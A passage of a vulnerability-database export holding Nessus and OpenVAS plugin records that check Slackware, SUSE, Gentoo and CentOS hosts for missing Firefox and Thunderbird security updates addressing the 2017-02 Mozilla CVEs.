audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:14", "bulletinFamily": "scanner", "description": "New mozilla-thunderbird packages are available for Slackware 14.1, 14.2, and -current to fix security issues.", "modified": "2018-09-04T00:00:00", "id": "SLACKWARE_SSA_2017-026-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96804", "published": "2017-01-27T00:00:00", "title": "Slackware 14.1 / 14.2 / current : mozilla-thunderbird (SSA:2017-026-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-026-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96804);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/09/04 13:20:08\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"SSA\", value:\"2017-026-01\");\n\n script_name(english:\"Slackware 14.1 / 14.2 / current : mozilla-thunderbird (SSA:2017-026-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New mozilla-thunderbird packages are available for Slackware 14.1,\n14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.448861\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?315a213f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"mozilla-thunderbird\", pkgver:\"45.7.0\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:23", "bulletinFamily": "scanner", "description": "MozillaFirefox 45 ESR was updated to 45.7 to fix the following issues (bsc#1021991) :\n\n - MFSA 2017-02/CVE-2017-5378: Pointer and frame data leakage of JavaScript objects (bsc#1021818)\n\n - MFSA 2017-02/CVE-2017-5396: Use-after-free with Media Decoder (bsc#1021821)\n\n - MFSA 2017-02/CVE-2017-5386: WebExtensions can use data:\n protocol to affect other extensions (bsc#1021823)\n\n - MFSA 2017-02/CVE-2017-5380: Potential use-after-free during DOM manipulations (bsc#1021819)\n\n - MFSA 2017-02/CVE-2017-5390: Insecure communication methods in Developer Tools JSON viewer (bsc#1021820)\n\n - MFSA 2017-02/CVE-2017-5373: Memory safety bugs fixed in Firefox 51 and Firefox ESR 45.7 (bsc#1021824)\n\n - MFSA 2017-02/CVE-2017-5375: Excessive JIT code allocation allows bypass of ASLR and DEP (bsc#1021814)\n\n - MFSA 2017-02/CVE-2017-5376: Use-after-free in XSL (bsc#1021817)\n\n - MFSA 2017-02/CVE-2017-5383: Location bar spoofing with unicode characters (bsc#1021822) Please see https://www.mozilla.org/en-US/security/advisories/mfsa20 17-02/ for more information.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-30T00:00:00", "id": "SUSE_SU-2017-0426-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=97081", "published": "2017-02-09T00:00:00", "title": "SUSE SLES11 Security Update : MozillaFirefox (SUSE-SU-2017:0426-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0426-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97081);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2018/11/30 10:54:50\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n\n script_name(english:\"SUSE SLES11 Security Update : MozillaFirefox (SUSE-SU-2017:0426-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MozillaFirefox 45 ESR was updated to 45.7 to fix the following issues\n(bsc#1021991) :\n\n - MFSA 2017-02/CVE-2017-5378: Pointer and frame data\n leakage of JavaScript objects (bsc#1021818)\n\n - MFSA 2017-02/CVE-2017-5396: Use-after-free with Media\n Decoder (bsc#1021821)\n\n - MFSA 2017-02/CVE-2017-5386: WebExtensions can use data:\n protocol to affect other extensions (bsc#1021823)\n\n - MFSA 2017-02/CVE-2017-5380: Potential use-after-free\n during DOM manipulations (bsc#1021819)\n\n - MFSA 2017-02/CVE-2017-5390: Insecure communication\n methods in Developer Tools JSON viewer (bsc#1021820)\n\n - MFSA 2017-02/CVE-2017-5373: Memory safety bugs fixed in\n Firefox 51 and Firefox ESR 45.7 (bsc#1021824)\n\n - MFSA 2017-02/CVE-2017-5375: Excessive JIT code\n allocation allows bypass of ASLR and DEP (bsc#1021814)\n\n - MFSA 2017-02/CVE-2017-5376: Use-after-free in XSL\n (bsc#1021817)\n\n - MFSA 2017-02/CVE-2017-5383: Location bar spoofing with\n unicode characters (bsc#1021822) Please see\n https://www.mozilla.org/en-US/security/advisories/mfsa20\n 17-02/ for more information.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021991\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5373/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5375/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5376/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5378/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5380/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5383/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5386/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5390/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5396/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170426-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fded08ba\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch\nsleclo50sp3-MozillaFirefox-12973=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch\nslemap21-MozillaFirefox-12973=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-MozillaFirefox-12973=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-MozillaFirefox-12973=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-45.7.0esr-65.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-translations-45.7.0esr-65.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-45.7.0esr-65.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-translations-45.7.0esr-65.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:29:29", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201702-22 (Mozilla Firefox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, bypass access restriction, access otherwise protected information, or spoof content via multiple vectors.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-09-04T00:00:00", "id": "GENTOO_GLSA-201702-22.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=97265", "published": "2017-02-21T00:00:00", "title": "GLSA-201702-22 : Mozilla Firefox: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201702-22.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97265);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2018/09/04 13:20:07\");\n\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\", \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\", \"CVE-2017-5396\");\n script_xref(name:\"GLSA\", value:\"201702-22\");\n\n script_name(english:\"GLSA-201702-22 : Mozilla Firefox: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201702-22\n(Mozilla Firefox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Mozilla Firefox. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, bypass\n access restriction, access otherwise protected information, or spoof\n content via multiple vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201702-22\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Mozilla Firefox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-45.7.0'\n All Mozilla Firefox binary users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/firefox-bin-45.7.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:firefox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/firefox-bin\", unaffected:make_list(\"ge 45.7.0\"), vulnerable:make_list(\"lt 45.7.0\"))) flag++;\nif (qpkg_check(package:\"www-client/firefox\", unaffected:make_list(\"ge 45.7.0\"), vulnerable:make_list(\"lt 45.7.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:23", "bulletinFamily": "scanner", "description": "Check the version of firefox", "modified": "2019-03-08T00:00:00", "published": "2017-01-27T00:00:00", "id": "OPENVAS:1361412562310882641", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882641", "title": "CentOS Update for firefox CESA-2017:0190 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2017:0190 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882641\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-27 05:41:52 +0100 (Fri, 27 Jan 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2017:0190 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nand Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0190\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-January/022251.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~45.7.0~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:53", "bulletinFamily": "scanner", "description": "Check the version of firefox", "modified": "2019-03-08T00:00:00", "published": "2017-01-27T00:00:00", "id": "OPENVAS:1361412562310882644", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882644", "title": "CentOS Update for firefox CESA-2017:0190 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2017:0190 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882644\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-27 05:42:13 +0100 (Fri, 27 Jan 2017)\");\n script_cve_id(\"CVE-2017-5373\", \"CVE-2017-5375\", \"CVE-2017-5376\", \"CVE-2017-5378\",\n \"CVE-2017-5380\", \"CVE-2017-5383\", \"CVE-2017-5386\", \"CVE-2017-5390\",\n \"CVE-2017-5396\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for firefox CESA-2017:0190 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of firefox\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser.\n\nThis update upgrades Firefox to version 45.7.0 ESR.\n\nSecurity Fix(es):\n\n * Multiple flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,\nCVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Jann Horn, Muneaki Nishimura, Nils, Armin Razmjou,\nChristian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,\nand Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0190\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-January/022253.html\");\n script_tag(name:\"solution_type\", 